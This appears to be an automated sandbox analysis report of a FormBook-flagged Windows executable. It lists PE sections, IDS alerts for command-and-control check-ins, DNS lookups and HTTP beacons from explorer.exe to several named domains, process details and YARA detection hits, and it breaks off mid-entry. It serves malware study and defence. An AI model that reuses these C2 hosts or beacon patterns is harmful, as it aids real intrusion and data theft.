                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc31a00x4f.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5f4.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xc60000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xc31840x1c.text
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000xc11f80xc1200False0.778078226133data7.40347651298IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0xc40000x5f40x600False0.434244791667data4.20291982241IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0xc60000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_VERSION0xc40900x364data
                                                                    RT_MANIFEST0xc44040x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                    Imports

                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain

                                                                    Version Infos

                                                                    DescriptionData
                                                                    Translation0x0000 0x04b0
                                                                    LegalCopyrightCopyright 2020
                                                                    Assembly Version1.0.0.0
                                                                    InternalNameIdentityNotMappedExcepti.exe
                                                                    FileVersion1.0.0.0
                                                                    CompanyName
                                                                    LegalTrademarks
                                                                    Comments
                                                                    ProductNameModul VB 3
                                                                    ProductVersion1.0.0.0
                                                                    FileDescriptionModul VB 3
                                                                    OriginalFilenameIdentityNotMappedExcepti.exe

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    08/03/21-18:26:15.542488TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972680192.168.2.5198.54.126.105
                                                                    08/03/21-18:26:15.542488TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972680192.168.2.5198.54.126.105
                                                                    08/03/21-18:26:15.542488TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972680192.168.2.5198.54.126.105
                                                                    08/03/21-18:26:20.797106TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.534.102.136.180
                                                                    08/03/21-18:26:20.797106TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.534.102.136.180
                                                                    08/03/21-18:26:20.797106TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972980192.168.2.534.102.136.180
                                                                    08/03/21-18:26:20.911098TCP1201ATTACK-RESPONSES 403 Forbidden804972934.102.136.180192.168.2.5
                                                                    08/03/21-18:26:53.982804TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.5223.29.234.230
                                                                    08/03/21-18:26:53.982804TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.5223.29.234.230
                                                                    08/03/21-18:26:53.982804TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.5223.29.234.230

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Aug 3, 2021 18:26:15.374298096 CEST4972680192.168.2.5198.54.126.105
                                                                    Aug 3, 2021 18:26:15.542203903 CEST8049726198.54.126.105192.168.2.5
                                                                    Aug 3, 2021 18:26:15.542391062 CEST4972680192.168.2.5198.54.126.105
                                                                    Aug 3, 2021 18:26:15.542488098 CEST4972680192.168.2.5198.54.126.105
                                                                    Aug 3, 2021 18:26:15.712918043 CEST8049726198.54.126.105192.168.2.5
                                                                    Aug 3, 2021 18:26:15.712949991 CEST8049726198.54.126.105192.168.2.5
                                                                    Aug 3, 2021 18:26:15.713170052 CEST4972680192.168.2.5198.54.126.105
                                                                    Aug 3, 2021 18:26:15.713287115 CEST4972680192.168.2.5198.54.126.105
                                                                    Aug 3, 2021 18:26:15.882203102 CEST8049726198.54.126.105192.168.2.5
                                                                    Aug 3, 2021 18:26:20.780152082 CEST4972980192.168.2.534.102.136.180
                                                                    Aug 3, 2021 18:26:20.796807051 CEST804972934.102.136.180192.168.2.5
                                                                    Aug 3, 2021 18:26:20.796936989 CEST4972980192.168.2.534.102.136.180
                                                                    Aug 3, 2021 18:26:20.797106028 CEST4972980192.168.2.534.102.136.180
                                                                    Aug 3, 2021 18:26:20.813962936 CEST804972934.102.136.180192.168.2.5
                                                                    Aug 3, 2021 18:26:20.911098003 CEST804972934.102.136.180192.168.2.5
                                                                    Aug 3, 2021 18:26:20.911204100 CEST804972934.102.136.180192.168.2.5
                                                                    Aug 3, 2021 18:26:20.911437035 CEST4972980192.168.2.534.102.136.180
                                                                    Aug 3, 2021 18:26:20.911519051 CEST4972980192.168.2.534.102.136.180
                                                                    Aug 3, 2021 18:26:20.930290937 CEST804972934.102.136.180192.168.2.5
                                                                    Aug 3, 2021 18:26:37.324582100 CEST4973080192.168.2.5198.54.117.218
                                                                    Aug 3, 2021 18:26:37.491797924 CEST8049730198.54.117.218192.168.2.5
                                                                    Aug 3, 2021 18:26:37.491883039 CEST4973080192.168.2.5198.54.117.218
                                                                    Aug 3, 2021 18:26:37.492023945 CEST4973080192.168.2.5198.54.117.218
                                                                    Aug 3, 2021 18:26:37.659487963 CEST8049730198.54.117.218192.168.2.5
                                                                    Aug 3, 2021 18:26:37.659518003 CEST8049730198.54.117.218192.168.2.5

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Aug 3, 2021 18:24:27.172913074 CEST6530753192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:24:27.219603062 CEST53653078.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:24:27.575287104 CEST6434453192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:24:27.607637882 CEST53643448.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:24:28.195153952 CEST6206053192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:24:28.222557068 CEST53620608.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:24:28.345031977 CEST6180553192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:24:28.377428055 CEST53618058.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:24:29.660536051 CEST5479553192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:24:29.686000109 CEST53547958.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:24:30.676867962 CEST4955753192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:24:30.717699051 CEST53495578.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:24:31.231796026 CEST6173353192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:24:31.268788099 CEST53617338.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:24:31.594803095 CEST6544753192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:24:31.622525930 CEST53654478.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:24:32.873420000 CEST5244153192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:24:32.909331083 CEST53524418.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:24:34.425580978 CEST6217653192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:24:34.450665951 CEST53621768.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:24:36.074873924 CEST5959653192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:24:36.099934101 CEST53595968.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:24:36.855380058 CEST6529653192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:24:36.881489992 CEST53652968.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:24:40.282782078 CEST6318353192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:24:40.310189962 CEST53631838.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:24:41.129328012 CEST6015153192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:24:41.159348965 CEST53601518.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:24:51.946479082 CEST5696953192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:24:51.980468035 CEST53569698.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:25:03.100332022 CEST5516153192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:25:03.137058020 CEST53551618.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:25:22.512311935 CEST5475753192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:25:22.547055960 CEST53547578.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:25:25.473907948 CEST4999253192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:25:25.510607958 CEST53499928.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:25:39.738980055 CEST6007553192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:25:39.794291019 CEST53600758.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:25:45.303232908 CEST5501653192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:25:45.337323904 CEST53550168.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:26:09.839133978 CEST6434553192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:26:10.303777933 CEST53643458.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:26:15.319434881 CEST5712853192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:26:15.370718956 CEST53571288.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:26:16.690603018 CEST5479153192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:26:16.737847090 CEST53547918.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:26:18.794346094 CEST5046353192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:26:18.835032940 CEST53504638.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:26:20.726124048 CEST5039453192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:26:20.778676987 CEST53503948.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:26:25.950511932 CEST5853053192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:26:26.333971977 CEST53585308.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:26:31.351497889 CEST5381353192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:26:31.864424944 CEST53538138.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:26:37.261212111 CEST6373253192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:26:37.297532082 CEST53637328.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:26:42.740745068 CEST5734453192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:26:42.924705029 CEST53573448.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:26:48.287003040 CEST5445053192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:26:48.414810896 CEST53544508.8.8.8192.168.2.5
                                                                    Aug 3, 2021 18:26:53.710860014 CEST5926153192.168.2.58.8.8.8
                                                                    Aug 3, 2021 18:26:53.749840975 CEST53592618.8.8.8192.168.2.5

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    Aug 3, 2021 18:26:09.839133978 CEST192.168.2.58.8.8.80x4a65Standard query (0)www.tpcgzwlpyggm.mobiA (IP address)IN (0x0001)
                                                                    Aug 3, 2021 18:26:15.319434881 CEST192.168.2.58.8.8.80x3184Standard query (0)www.vectoroutlines.comA (IP address)IN (0x0001)
                                                                    Aug 3, 2021 18:26:20.726124048 CEST192.168.2.58.8.8.80x5822Standard query (0)www.3cheer.comA (IP address)IN (0x0001)
                                                                    Aug 3, 2021 18:26:25.950511932 CEST192.168.2.58.8.8.80xa8fcStandard query (0)www.m678.xyzA (IP address)IN (0x0001)
                                                                    Aug 3, 2021 18:26:31.351497889 CEST192.168.2.58.8.8.80x3b41Standard query (0)www.kce0728com.netA (IP address)IN (0x0001)
                                                                    Aug 3, 2021 18:26:37.261212111 CEST192.168.2.58.8.8.80x746eStandard query (0)www.boogerstv.comA (IP address)IN (0x0001)
                                                                    Aug 3, 2021 18:26:42.740745068 CEST192.168.2.58.8.8.80x49f2Standard query (0)www.leonardocarrillo.comA (IP address)IN (0x0001)
                                                                    Aug 3, 2021 18:26:48.287003040 CEST192.168.2.58.8.8.80xb99dStandard query (0)www.hazard-protection.comA (IP address)IN (0x0001)
                                                                    Aug 3, 2021 18:26:53.710860014 CEST192.168.2.58.8.8.80xfef8Standard query (0)www.mercuryaid.netA (IP address)IN (0x0001)

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    Aug 3, 2021 18:26:10.303777933 CEST8.8.8.8192.168.2.50x4a65Name error (3)www.tpcgzwlpyggm.mobinonenoneA (IP address)IN (0x0001)
                                                                    Aug 3, 2021 18:26:15.370718956 CEST8.8.8.8192.168.2.50x3184No error (0)www.vectoroutlines.comvectoroutlines.comCNAME (Canonical name)IN (0x0001)
                                                                    Aug 3, 2021 18:26:15.370718956 CEST8.8.8.8192.168.2.50x3184No error (0)vectoroutlines.com198.54.126.105A (IP address)IN (0x0001)
                                                                    Aug 3, 2021 18:26:20.778676987 CEST8.8.8.8192.168.2.50x5822No error (0)www.3cheer.com3cheer.comCNAME (Canonical name)IN (0x0001)
                                                                    Aug 3, 2021 18:26:20.778676987 CEST8.8.8.8192.168.2.50x5822No error (0)3cheer.com34.102.136.180A (IP address)IN (0x0001)
                                                                    Aug 3, 2021 18:26:26.333971977 CEST8.8.8.8192.168.2.50xa8fcName error (3)www.m678.xyznonenoneA (IP address)IN (0x0001)
                                                                    Aug 3, 2021 18:26:31.864424944 CEST8.8.8.8192.168.2.50x3b41Server failure (2)www.kce0728com.netnonenoneA (IP address)IN (0x0001)
                                                                    Aug 3, 2021 18:26:37.297532082 CEST8.8.8.8192.168.2.50x746eNo error (0)www.boogerstv.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                    Aug 3, 2021 18:26:37.297532082 CEST8.8.8.8192.168.2.50x746eNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                    Aug 3, 2021 18:26:37.297532082 CEST8.8.8.8192.168.2.50x746eNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                    Aug 3, 2021 18:26:37.297532082 CEST8.8.8.8192.168.2.50x746eNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                    Aug 3, 2021 18:26:37.297532082 CEST8.8.8.8192.168.2.50x746eNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                    Aug 3, 2021 18:26:37.297532082 CEST8.8.8.8192.168.2.50x746eNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                    Aug 3, 2021 18:26:37.297532082 CEST8.8.8.8192.168.2.50x746eNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                    Aug 3, 2021 18:26:37.297532082 CEST8.8.8.8192.168.2.50x746eNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                    Aug 3, 2021 18:26:42.924705029 CEST8.8.8.8192.168.2.50x49f2No error (0)www.leonardocarrillo.com172.107.55.6A (IP address)IN (0x0001)
                                                                    Aug 3, 2021 18:26:48.414810896 CEST8.8.8.8192.168.2.50xb99dNo error (0)www.hazard-protection.com148.59.128.71A (IP address)IN (0x0001)
                                                                    Aug 3, 2021 18:26:53.749840975 CEST8.8.8.8192.168.2.50xfef8No error (0)www.mercuryaid.netmercuryaid.netCNAME (Canonical name)IN (0x0001)
                                                                    Aug 3, 2021 18:26:53.749840975 CEST8.8.8.8192.168.2.50xfef8No error (0)mercuryaid.net223.29.234.230A (IP address)IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • www.vectoroutlines.com
                                                                    • www.3cheer.com
                                                                    • www.boogerstv.com

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.549726198.54.126.10580C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Aug 3, 2021 18:26:15.542488098 CEST4735OUTGET /p2io/?BJ=RfOK6jKhDkXNwKgMe5LTyAppaXreGCTFIz0prsbY2047Xu3Gxs4GQwDY2/SnNVlkbHQV&b2Ml9=0txtgJLXY6ULB HTTP/1.1
                                                                    Host: www.vectoroutlines.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Aug 3, 2021 18:26:15.712918043 CEST4736INHTTP/1.1 301 Moved Permanently
                                                                    content-type: text/html
                                                                    content-length: 707
                                                                    date: Tue, 03 Aug 2021 16:26:15 GMT
                                                                    server: LiteSpeed
                                                                    location: https://www.vectoroutlines.com/p2io/?BJ=RfOK6jKhDkXNwKgMe5LTyAppaXreGCTFIz0prsbY2047Xu3Gxs4GQwDY2/SnNVlkbHQV&b2Ml9=0txtgJLXY6ULB
                                                                    x-turbo-charged-by: LiteSpeed
                                                                    connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.2.54972934.102.136.18080C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Aug 3, 2021 18:26:20.797106028 CEST4754OUTGET /p2io/?BJ=hDwxgnCxHqZG/nBf9NFToL98ekU0apx9FaMqifAGLuP7v/j66cUXhxpzlnLclYHrbOLF&b2Ml9=0txtgJLXY6ULB HTTP/1.1
                                                                    Host: www.3cheer.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Aug 3, 2021 18:26:20.911098003 CEST4755INHTTP/1.1 403 Forbidden
                                                                    Server: openresty
                                                                    Date: Tue, 03 Aug 2021 16:26:20 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 275
                                                                    ETag: "6104831f-113"
                                                                    Via: 1.1 google
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    2192.168.2.549730198.54.117.21880C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Aug 3, 2021 18:26:37.492023945 CEST4756OUTGET /p2io/?BJ=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7jRLyNqpfuRL&b2Ml9=0txtgJLXY6ULB HTTP/1.1
                                                                    Host: www.boogerstv.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:


                                                                    Code Manipulations

                                                                    Statistics

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Start time:18:24:35
                                                                    Start date:03/08/2021
                                                                    Path:C:\Users\user\Desktop\V5cfxBHd71.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\V5cfxBHd71.exe'
                                                                    Imagebase:0xea0000
                                                                    File size:793600 bytes
                                                                    MD5 hash:182170393A1ACD19744575F00562384F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    General

                                                                    Start time:18:24:47
                                                                    Start date:03/08/2021
                                                                    Path:C:\Users\user\Desktop\V5cfxBHd71.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\V5cfxBHd71.exe
                                                                    Imagebase:0x4d0000
                                                                    File size:793600 bytes
                                                                    MD5 hash:182170393A1ACD19744575F00562384F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    General

                                                                    Start time:18:24:49
                                                                    Start date:03/08/2021
                                                                    Path:C:\Windows\explorer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                    Imagebase:0x7ff693d90000
                                                                    File size:3933184 bytes
                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:18:25:31
                                                                    Start date:03/08/2021
                                                                    Path:C:\Windows\SysWOW64\msdt.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\msdt.exe
                                                                    Imagebase:0x1290000
                                                                    File size:1508352 bytes
                                                                    MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
